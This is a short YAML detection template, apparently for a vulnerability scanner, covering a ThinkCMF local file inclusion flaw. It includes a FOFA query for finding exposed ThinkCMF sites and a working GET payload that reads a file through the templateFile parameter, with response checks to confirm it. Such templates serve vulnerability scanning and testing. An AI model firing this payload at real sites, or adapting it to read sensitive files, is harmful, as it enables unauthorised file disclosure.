product: ThinkCMF
vName: ThinkCMF Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: ThinkCMF is vulnerable to local file inclusion.
version: ''
note: ''
search:
  FOFA: app="ThinkCMF"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /?a=display&templateFile=README.md
    verify:
      logic: and
      check:
        - body:
            value:
              - ThinkCMF
              - '## README'
              - '## UPDATE'
            logic: and
        - status: 200